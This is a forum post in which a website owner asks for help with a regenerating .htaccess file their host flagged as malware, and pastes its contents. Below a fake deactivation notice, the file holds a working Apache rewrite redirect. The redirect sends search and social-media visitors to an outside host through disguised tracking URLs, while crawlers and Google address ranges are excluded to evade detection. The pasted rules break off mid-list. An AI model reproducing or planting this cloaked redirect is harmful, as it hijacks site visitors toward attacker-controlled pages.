
Cannot delete malicious .htaccess file



#1 247earnings


Posted 25 March 2018 - 03:30 PM

I have a perplexing problem.  My ISP ran a scan of my account and identified one file in my root directory as being malware.  They deactivated 11 of my sites to prevent further contamination to the server.  The file is an .htaccess file that appears to be the deactivation instructions of my ISP (They deny creating it).  However, about 900 blank lines down from the .htaccess instructions were over 1,000 lines of additional code.  I believe this code is malicious and causing the "malware alert" problem.

 

I tried to delete the .htaccess file as instructed by my ISP.  It immediately regenerated. 

I tried to edit the file to delete the instructions.  Editing of the file was denied. 

I changed the file permissions to 777 to allow me to have complete edit capability.  However, I was still denied. 

 

I contacted my ISP and they assured me it was not "their" .htaccess file.  They said they did not deactivate accounts via an .htaccess file.  They said it was malware causing the problem.  They even tried to delete/modify the file but were unable to do so.  They tried everything that I did from the server side but to no avail. 

 

I am totally exasperated.  They told me I had to find a security developer to clear the malware.  The cost to try and fix this problem (delete this one file) runs anywhere from $87.00 - $199.95.  I am asking the community for help. 

 

Here is the complete .htaccess file.  I have deleted the 900 blank lines for brevity of posting.  If anyone has any ideas, I sure would be grateful.  I added the dotted lines for clarification.

 

-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------   

# <deactivate www.247marketinggroup.com>
# Reason for deactivation: deactivate%20flag
# Please contact us to remedy this situation as soon as possible
# </deactivate>
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
900 lines down the following script was found:
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
<IfModule prefork.c>
RewriteEngine On
RewriteCond %{REQUEST_METHOD}   ^GET$
RewriteCond %{HTTP_REFERER}     ^(http\:\/\/)?([^\/\?]*\.)?(tweet|twit|linkedin|instagram|facebook\.|myspace\.|bebo\.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER}     ^(http\:\/\/)?([^\/\?]*\.)?(hi5\.|blogspot\.|friendfeed\.|friendster\.|google\.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER}     ^(http\:\/\/)?([^\/\?]*\.)?(yahoo\.|bing\.|msn\.|ask\.|excite\.|altavista\.|netscape\.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER}     ^(http\:\/\/)?([^\/\?]*\.)?(aol\.|hotbot\.|goto\.|infoseek\.|mamma\.|alltheweb\.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER}     ^(http\:\/\/)?([^\/\?]*\.)?(lycos\.|metacrawler\.|mail\.|pinterest|instagram).*$   [NC]
RewriteCond %{HTTP_REFERER}     !^.*(imgres).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(bing|Accoona|Ace\sExplorer|Amfibi|Amiga\sOS|apache|appie|AppleSyndication).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Archive|Argus|Ask\sJeeves|asterias|Atrenko\sNews|BeOS|BigBlogZoo).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Biz360|Blaiz|Bloglines|BlogPulse|BlogSearch|BlogsLive|BlogsSay|blogWatcher).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Bookmark|bot|CE\-Preload|CFNetwork|cococ|Combine|Crawl|curl|Danger\shiptop).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Diagnostics|DTAAgent|EmeraldShield|endo|Evaal|Everest\-Vulcan).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(exactseek|Feed|Fetch|findlinks|FreeBSD|Friendster|bleep\sYou|Google).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Gregarius|HatenaScreenshot|heritrix|HolyCowDude|Honda\-Search|HP\-UX).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(HTML2JPG|HttpClient|httpunit|ichiro|iGetter|IRIX|Jakarta|JetBrains).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Krugle|Labrador|larbin|LeechGet|libwww|Liferea|LinkChecker).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(LinknSurf|Linux|LiveJournal|Lonopono|Lotus\-Notes|Lycos|Lynx|Mac\_PowerPC).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Mac\_PPC|Mac\s10|macDN|Mediapartners|Megite|MetaProducts).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Miva|Mobile|NetBSD|NetNewsWire|NetResearchServer|NewsAlloy|NewsFire).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(NewsGatorOnline|NewsMacPro|Nokia|NuSearch|Nutch|ObjectSearch|Octora).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(OmniExplorer|Omnipelagos|Onet|OpenBSD|OpenIntelligenceData|oreilly).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(os\=Mac|P900i|panscient|perl|PlayStation|POE\-Component|PrivacyFinder).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(psycheclone|Python|retriever|Rojo|RSS|SBIder|Scooter|Seeker|Series\s60).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(SharpReader|SiteBar|Slurp|Snoopy|Soap\sClient|Socialmarks|Sphere\sScout).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(spider|sproose|Rambler|Straw|subscriber|SunOS|Surfer|Syndic8).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Syntryx|TargetYourNews|Technorati|Thunderbird|Twiceler|urllib|Validator).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Vienna|voyager|W3C|Wavefire|webcollage|Webmaster|WebPatrol|wget|Win\s9x).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Win16|Win95|Win98|Windows\s95|Windows\s98|Windows\sCE|Windows\sNT\s4).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(WinHTTP|WinNT4|WordPress|WWWeasel|wwwster|yacy|Yahoo).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Yandex|Yeti|YouReadMe|Zhuaxia|ZyBorg).*$   [NC]
RewriteCond %{REQUEST_FILENAME} !.*jpg$|.*gif$|.*png|.*jpeg|.*mpg|.*avi|.*zip|.*gz|.*tar|.*ico$ [NC]
RewriteCond %{REMOTE_ADDR}      !^66\.249.*$ [NC]
RewriteCond %{REMOTE_ADDR}      !^74\.125.*$ [NC]
RewriteCond %{HTTP_COOKIE}      !^.*bFP.*$ [NC]
RewriteCond %{HTTP_USER_AGENT}  .*(Windows|Macintosh|iPad|iPhone|iPod|Android).* [NC]
RewriteCond %{HTTPS}            ^off$
RewriteRule .* - [E=bFP:%{TIME_SEC}]
RewriteRule .* - [E=mBZ:ugustus.bristolblog.com]
 
RewriteCond %{ENV:bFP} 0
RewriteRule ^.* http://%{ENV:mBZ}/t.gif?_=1340684907394&count=none&id=twitter-widget-0&lang=en&original_referer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&related=kaskus:Official\%20Kaskus\%20Account&size=m&text=\%5BJ-Music\%5D\%5BIDOL\%5D\%5BHello!Project\%5D\%20S/mileage\%20\%E3\%82\%B9\%E3\%83\%9E\%E3\%82\%A4\%E3\%83\%AC\%E3\%83\%BC\%E3\%82\%B8\%20FANS\%20-\%20http\\%3A\\%2F\\%2Fkask.us/7434479\%20\%23kaskus&url=none&type=share&twttr_referrer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&twttr_widget=1&twttr_hask=1&twttr_li=0&twttr_pid=v3:1340676210490101614564553  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:11663:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 1
RewriteRule ^.* http://%{ENV:mBZ}/dcs0junic89k7m2gzez6wz0k8_7v8n/dcs.gif?&dcsdat=1341563984319&dcssip=office.microsoft.com&dcsuri=/en-us/images/results.aspx&dcsqry=?qu=business\%2520finance\%26ctt=1&dcsref=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&WT.tz=7&WT.ti=Search\%20results\%20for\%20business\%20finance\%20-\%20Images\%20and\%20More\%20-\%20Office.com&WT.le=UTF-8&WT.dl=0&WT.ssl=0&WT.es=office.microsoft.com/en-us/images/results.aspx&WT.cg_n=images&WT.z_css=business\%20finance&WT.dcsvid=78d34d2d90963a43998e579cd229c902&WT.z_MUID=2719E8F1F1D16D2116BCEB64F5D16DFA\%26TUID\%3D1&WT.vt_f_tlh=1341563984&WT.vtvs=1341563903678&WT.vtid=2c67220b76d4e7141c11296756165557&WT.co_f=2c67220b76d4e7141c11296756165557&oo_source=Web&oo_orig_appver=ZPP120&oo_ul=en-US&oo_offver=Other&oo_assetid=EC079000012&oo_market=en-US&oo_bc=images&oo_clicktype=1&oo_hash=mt:2\%7C&WT.z_rviewTrig=1&WT.z_tbb=0&WT.z_searchid=c339655f-522e-47b3-beda-e58b0b1637ed&WT.z_filter_evt=1&WT.z_OriginSubweb=Images\%20and\%20More&WT.z_OriginAssetID=EC079000012&WT.z_PageNumber=4&WT.z_PerPage=25&WT.z_Position=76:77:78:79:80:81:82:83:84:85:86:87:88:89:90:91:92:93:94:95:96:97:98:99:100:&WT.z_SearchAssetID=MP900285084:MP900427941:MP900444146:MP900341936:MP900442307:MP900442965:MP900448379:MP900442969:MP900443263:MP900442414:MP900442294:MP900442178:MP900442513:MP900442214:MP900341889:MP900315594:MP900399487:MP900422401:MP900305913:MP900305912:MP900427657:MP900399495:MP900398759:MP900308987:MP900341968:&wtEvtSrc=office.microsoft.com/en-us/images/results.aspx  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:11655:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 2
RewriteRule ^.* http://%{ENV:mBZ}/b?c1=2&c2=6036211&rn=0.39846566036461484&c7=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&c3=&c4=&c5=&c6=&c10=&c15=&c16=&c8=&c9=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&cv=1.7  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:11524:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 3
RewriteRule ^.* http://%{ENV:mBZ}/s?referrer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&volume=100&sd=B6F5EF807HH1341227667509892&feature=related&et=3.036&hbd=4301815&el=detailpage&fexp=920704,921602,901700,913542,907335,922600,919306,924700,914030,907344,907217,920706,924500,902518,919324,906043,919316,912706&vtmp=1&hbt=93.915&sendtmp=1&csipt=watch5&hasstoryboard=1&plid=AATD1uag0Iw35kji&nbe=1&ptk=youtube_none&tpmt=2&w=480&cr=ID&h=360&rt=26.339&vid=Dt7x356SANpp6pHxvDgx0IBCzt9RNQE4C&fmt=34&cfps=0&hl=en_US&sdetail=f:related\%2Crv:MUojevLL1pY&bc=283761&bd=217443&screenh=768&playerw=640&bt=19.945&playerh=390&ns=yt&scoville=1&docid=KLU-qbgFSSs&len=45.746&screenw=1024&sourceid=yw&md=1&pd=1.171&lact=15744&vq=auto&fbe=1&fs=0&st=0&mos=0  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:9463:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 4
RewriteRule ^.* http://%{ENV:mBZ}/g.gif?host=kudalumpingmakanpager.wordpress.com&rand=0.025170490276088198&blog=4215369&v=wpcom&user_id=0&subd=kudalumpingmakanpager&ref=http\%3A\%2F\%2F%{HTTP_HOST}\%2F  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:11345:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 5
RewriteRule ^.* http://%{ENV:mBZ}/t.gif?_=1341544947081&count=vertical&id=twitter-widget-0&lang=en&original_referer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&size=m&text=terselubung:\%2012\%20Kaum\%20yang\%20Dibinasakan\%20Allah&url=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&via=terselubung&type=share&twttr_referrer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&twttr_widget=1&twttr_hask=0&twttr_li=0&twttr_pid=v3:1341544705461413794944964  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:11579:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 6
RewriteRule ^.* http://%{ENV:mBZ}/t/image.gif?sid=d3a1663bf4499c77cc78957914adba25&vid=d3a1663bf4499c77cc78957914adba25&sik=&t=7cc61325b9a8d31403b7ad77d172579bf4c00b1a000001384544fbd8&w=1&i=56998511-1463-4800-a36c-ac326ada099c&aik=164188662&ri=31c785b9-28c7-4842-8ddf-0420b50fea89&ark=3562182&uid=77016168&apk=1692098&pnk=14&gk=&pt=1&rv=36&rpv=0&iv=2&udd=false&dd=&it=0&sq=0&ts=1341211483620&CXNID=2000003.0000000001NXC&l=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&cs=\%7Bt:\%221341211482870\%22\%7D&et=G  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:11539:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 7
RewriteRule ^.* http://%{ENV:mBZ}/delivery/lg.php?bannerid=36517&campaignid=7494&zoneid=562&channel_ids=,&loc=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&referer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&cb=2f93aa4273  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:10564:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 8
RewriteRule ^.* http://%{ENV:mBZ}/1pix.gif?dcsdat=1340349884843&dcssip=&os=Windows\%20XP&lang=en&flashVer=WIN\%2010\%2C1\%2C102\%2C64&dcsref=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&playerURL=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&videoId=1216096166001&dcsuri=/viewer/video_view&sourceId=89804535001&publisherId=89804535001&affiliateId=&playerId=1522730664001&lineupId=1521712908001&playerTag=  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:11947:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 9
RewriteRule ^.* http://%{ENV:mBZ}/b?c1=8&c2=6135404&c3=28&c4=13310&c10=3197034&ns__t=1341637388555&ns_c=ISO-8859-1&c8=&c7=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&c9=http\%3A\%2F\%2F%{HTTP_HOST}\%2F  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:11709:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 10
RewriteRule ^.* http://%{ENV:mBZ}/delivery/lg.php?bannerid=36709&campaignid=7505&zoneid=1656&channel_ids=,&loc=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&cb=437c0de007  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:11711:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 11
RewriteRule ^.* http://%{ENV:mBZ}/vrelease/j712062603/j7.php?/MComd/&11=&signed_request=Bz7axhF_UXRaOUdUSAy6DWltD7ZFlmNgNPIdUiLIguU.eyJhbGdvcml0aG0iOiJITUFDLVNIQTI1NiIsImV4cGlyZXMiOjEzNDA3MTU2MDAsImlzc3VlZF9hdCI6MTM0MDcwOTcwNiwib2F1dGhfdG9rZW4iOiJBQUFDd0JQOHE5RFlCQURaQzFqc1ZQUndsN2lzelBrZGhFOGY3MENHeVpCYjRJOGw0akNNWGQ1WFMwWW5Hck0wU1FtdDlHOG4xeXFRWkJKS3Fsb0k1U2FxcU1NQ1RUaVpDbUs3V09MNVF3enl5SmRSZFdBcG0iLCJ1c2VyIjp7ImNvdW50cnkiOiJpZCIsImxvY2FsZSI6ImVuX1VTIiwiYWdlIjp7Im1pbiI6MTgsIm1heCI6MjB9fSwidXNlcl9pZCI6IjE3NzY5NjAzNDkifQ&access_token=AAACwBP8q9DYBADZC1jsVPRwl7iszPkdhE8f70CGyZBb4I8l4jCMXd5XS0YnGrM0SQmt9G8n1yqQZBJKqloI5SaqqMMCTTiZCmK7WOL5QwzyyJdRdWApm&dataurl=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&canvasname=flowershopfun&isnew=0&url=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&token=token_4fe99b909996e&uId=1776960349&cdnurl=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&/index/index/=  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:10243:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 12
RewriteRule ^.* http://%{ENV:mBZ}/b?c1=2&c2=6035118&rn=0.6222928070151557&c7=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&c3=&c4=&c5=&c6=&c10=&c15=&c16=&c8=Season\%208\%20-\%20Arena\%20Junkies\%20Forums&c9=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&cv=1.7  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:9112:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 13
RewriteRule ^.* http://%{ENV:mBZ}/__utm.gif?utmwv=5.3.2&utms=1&utmn=1764539422&utmhn=wolipop.detik.com&utmcs=ISO-8859-1&utmsr=1024x768&utmvp=1008x640&utmsc=32-bit&utmul=en-us&utmje=0&utmfl=-&utmdt=wolipop.com&utmhid=2057085728&utmr=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&utmp=/\%3F993301lifestyle&utmac=UA-891770-46&utmcc=__utma\%3D1.2057668328.1329788352.1338792205.1340690233.8\%3B\%2B__utmz\%3D1.1340690233.8.8.utmcsr\%3Ddetik.com\%7Cutmccn\%3D(referral)\%7Cutmcmd\%3Dreferral\%7Cutmcct\%3D/\%3B&utmu=qhAAAAAg~  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:10133:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 14
RewriteRule ^.* http://%{ENV:mBZ}/__utm.gif?utmwv=5.3.2&utms=18&utmn=1188131309&utmhn=siva-id.jobstreet.com&utmcs=UTF-8&utmsr=1024x768&utmvp=1007x615&utmsc=24-bit&utmul=en-us&utmje=0&utmfl=10.0\%20r22&utmdt=SiVA\%20\%C2\%A9JobStreet.com&utmhid=1729579412&utmr=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&utmp=/applications/viewJobFolder.asp\%3FSearchMode\%3DFalse\%26ASC\%3D100000\%26QID\%3D065999223609053226\%257C7725165\%26QID2\%3D\%26Sort\%3D-133\%2C131\%2C105\%26SRC\%3D\%26SubF\%3D\%26PF\%3DFalse\%26JGID\%3D0\%26Spe\%3D134\%26Disct\%3DTrue\%26LocSrc\%3DFalse\%26Sought\%3D\%26HtmlKW\%3D\%26pcid\%3D\%26Role\%3D\%26SavedCriteria\%3D\%26JID\%3D897460289714148819\%257C523307\%26Rank\%3D0&utmac=UA-226014-6&utmcc=__utma\%3D1.698288290.1334714014.1340348039.1340584166.86\%3B\%2B__utmz\%3D1.1340348039.85.16.utmcsr\%3Dsiva-id.jobstreet.com\%7Cutmccn\%3D(referral)\%7Cutmcmd\%3Dreferral\%7Cutmcct\%3D/welcome/welcome.asp\%3B&utmu=qh~  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:11685:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 15
RewriteRule ^.* http://%{ENV:mBZ}/neo/darla/php/fc.php?trace=compose_new&tID=55&d=0&f=978532077&l=MNW&rn=1341544899754&en=utf-8&mb_s_en=utf-8&filter=no_expandable\%253Bajax_cert_expandable\%253Bexp_iframe_expandable\%253B&ref=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&sa=content\%253D\%2522minty_tenure\%253A\%2520week\%25203+\%2522&  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:9411:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 16
RewriteRule ^.* http://%{ENV:mBZ}/b?c1=2&c2=8443234&ns__t=1341255088819&ns_c=ISO-8859-1&c8=detik\%20Finance\%20:\%20Barometer\%20Bisnis\%20Anda&c7=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&c9=http\%3A\%2F\%2F%{HTTP_HOST}\%2F  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:9835:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 17
RewriteRule ^.* http://%{ENV:mBZ}/new2/www/delivery/lg.php?bannerid=10051&campaignid=3141&zoneid=20&loc=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&cb=ed3af7684f  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:11352:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 18
RewriteRule ^.* http://%{ENV:mBZ}/st?_PVID=GWeQJGoKp3FYFQuQT4JF0gDDyokXaE_38m8AB.0T&cnt=yan&ad_type=iframe&ad_size=120x600&entity=24276&site_code=mail&section_code=15167778&cb=1341649519593060&yud=zip\%3D\%26ycg\%3Df\%26yyob\%3D1980&pub_redirect_unencoded=1&pub_redirect=http\%3A\%2F\%2F%{HTTP_HOST}\%2F  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:9589:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 19
RewriteRule ^.* http://%{ENV:mBZ}/__utm.gif?utmwv=5.3.2&utms=1&utmn=1263138273&utmhn=food.detik.com&utmcs=ISO-8859-1&utmsr=768x1024&utmvp=980x644&utmsc=32-bit&utmul=en-us&utmje=0&utmfl=-&utmdt=detikFood:\%20Inilah\%2040\%20Makanan\%20Terenak\%20di\%20Indonesia!&utmhid=687041844&utmr=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&utmp=/read/2011/08/18/125254/1705897/294/inilah-40-makanan-terenak-di-indonesia  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:9614:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 20
RewriteRule ^.* http://%{ENV:mBZ}/servlet/ajrotator/125626/0/vj?z=adstars&ch=81116&dim=78535&pos=1&kw=Bisa\%2CBedakan\%2CAyam\%2CLepaas\%2Cdan\%2CAyam\%2CTangkap\%3F\%2C-\%2CKOMPAS.com\%2Cjakarta\%2Cayam\%20tangkap\%2Cayam\%20lepaas&pv=1154274028221161&nc=8704138&tz=420&url=http\%3A\%2F\%2F%{HTTP_HOST}\%2F  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:10480:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 21
RewriteRule ^.* http://%{ENV:mBZ}/b/ss/godolavanguardia/1/H.19.3/s34707490319237?AQB=1&ndh=1&t=26/0/2010\%2010:57:51\%202\%20-60&ce=ISO-8859-1&ns=grupogod&g=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&r=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&cc=EUR&ch=HagoClic&events=event2&h2=HagoClic.Enlacesdeldia&c4=HagoClic.Enlacesdeldia&s=1024x600&c=32&j=1.5&v=Y&k=Y&bw=1003&bh=440&ct=lan&hp=N&AQE=1  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:11921:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 22
RewriteRule ^.* http://%{ENV:mBZ}/delivery/lg.php?bannerid=4275&campaignid=2451&zoneid=767&channel_ids=,&loc=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&referer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&cb=16944f1483  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:11494:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 23
RewriteRule ^.* http://%{ENV:mBZ}/t.gif?_=1341813791094&count=horizontal&counturl=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&id=twitter_tweet_button_0&lang=id&original_referer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&text=Tom\%20Cruise\%20Hobi\%20Pakai\%20G-String\%20Saat\%20Remaja\%20-\%20Yahoo!\%20OMG!\%20Indonesia&url=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&type=share&size=m&twttr_referrer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&twttr_widget=1&twttr_hask=0&twttr_li=0&twttr_pid=v3:1337819184838534984160665  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:9579:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 24
RewriteRule ^.* http://%{ENV:mBZ}/new2/www/delivery/lg.php?bannerid=7763&campaignid=2423&zoneid=2&loc=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&cb=873ef7e8ee  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:9095:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 25
RewriteRule ^.* http://%{ENV:mBZ}/neo/darla/php/fc.php?trace=folder_sent&tID=1&d=0&f=978500095&l=SKY\%2CREC\%2CMNW&rn=1341905562484&en=utf-8&filter=no_expandable\%253Bajax_cert_expandable\%253Bexp_iframe_expandable\%253B&ref=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&sa=content\%253D\%2522minty_tenure\%253A\%2520week\%25203+\%2522&  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:9651:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 26
RewriteRule ^.* http://%{ENV:mBZ}/dis/dis.aspx?p=3585&t1=transaction&p1=v\%3D2\%26s\%3D0\%26wi\%3D7714897\%26i1\%3D\%26p1\%3D0\%26q1\%3D1&cb=5721404347&ref=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&sc_r=1024x768&sc_d=24  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:9523:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 27
RewriteRule ^.* http://%{ENV:mBZ}/pixel.gif?source=smarttag&fired=report&confid=Hi0kJsuv&geo_country=ID&geo_city=JAKARTA&_kpid=44c1a380-770f-11df-93f2-0800200c9a66&_kcp_s=Gaming&_kcp_d=wikia.com&_knifr=16&_kpref_=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&rtsegs=mc3n9p17i&_kpa_lang=en&_kpa_wpage=Characters&_kpa_cat=Characters&_kpa_keywords=Grand\%20Chase\%20Wiki\%2Cgrandchase\%2CCharacters\%2CElesis\%2CLire\%2CArme\%2CRin\%2CRonan\%2CLass\%2CRyan\%2CAmy\%2CJin\%2CSieghart&sview=2&kplt0=10952&tag10952_timing=\%7B\%22name\%22:\%22Krux\%20eXelate\%20Cookie\%20Match\%22\%2C\%22mode\%22:\%22async\%22\%2C\%22start\%22:23\%2C\%22end\%22:29\%2C\%22duration\%22:6\%7D&kplt1=10304&tag10304_timing=\%7B\%22name\%22:\%22Krux\%20Load\%20Segments\%22\%2C\%22mode\%22:\%22async\%22\%2C\%22start\%22:58\%2C\%22end\%22:73\%2C\%22duration\%22:15\%7D&kplt2=10854&tag10854_timing=\%7B\%22name\%22:\%22Krux\%20Attribute\%20Scraper\%22\%2C\%22mode\%22:\%22async\%22\%2C\%22start\%22:73\%2C\%22end\%22:174\%2C\%22duration\%22:101\%7D&kplt3=12260&tag12260_timing=\%7B\%22name\%22:\%22Kyle\%20-\%20Magnetic\%22\%2C\%22mode\%22:\%22async\%22\%2C\%22start\%22:175\%2C\%22end\%22:184\%2C\%22duration\%22:9\%7D&kplt4=10491&tag10491_timing=\%7B\%22name\%22:\%22VisualDNA\%22\%2C\%22mode\%22:\%22async\%22\%2C\%22start\%22:184\%2C\%22end\%22:190\%2C\%22duration\%22:6\%7D&kplt5=10600&tag10600_timing=\%7B\%22name\%22:\%22BlueKai\%22\%2C\%22mode\%22:\%22async\%22\%2C\%22start\%22:191\%2C\%22end\%22:197\%2C\%22duration\%22:6\%7D&kplt6=10632&tag10632_timing=\%7B\%22name\%22:\%22eXelate\%20Media\%22\%2C\%22mode\%22:\%22async\%22\%2C\%22start\%22:197\%2C\%22end\%22:1173\%2C\%22duration\%22:976\%7D&jsonp_requests=  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:11916:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 28
RewriteRule ^.* http://%{ENV:mBZ}/b/ss/jobsdb-prd-id/1/H.23.6/s78095071635067?AQB=1&ndh=1&t=26/5/2012\%2010:44:46\%202\%20-420&ce=UTF-8&ns=jobsdb&pageName=search/jobadsingledetail&g=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&r=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&server=id.jobsdb.com&events=event4\%2Cevent1&c1=ID&v1=ID&c2=search&v2=search&c4=logged\%20out:search/jobadsingledetail&v4=logged\%20out&c5=/id/id/search.mvc/jobadsingledetail&v5=/id/id/search.mvc/jobadsingledetail&c6=D\%3Dg&v6=D\%3Dg&c10=D\%3Ds_vi&v10=D\%3Ds_vi&v25=200003000417070&v30=Editorial\%20/\%20Journalism(80)&h1=search/jobadsingledetail&s=1024x768&c=32&j=1.7&v=N&k=Y&bw=674&bh=308&p=Mozilla\%20Default\%20Plug-in\%3B2007\%20Microsoft\%20Office\%20system\%3BAdobe\%20Acrobat\%3BMicrosoft\%C2\%AE\%20DRM\%3BWindows\%20Media\%20Player\%20Plug-in\%20Dynamic\%20Link\%20Library\%3B&AQE=1  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:11961:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 29
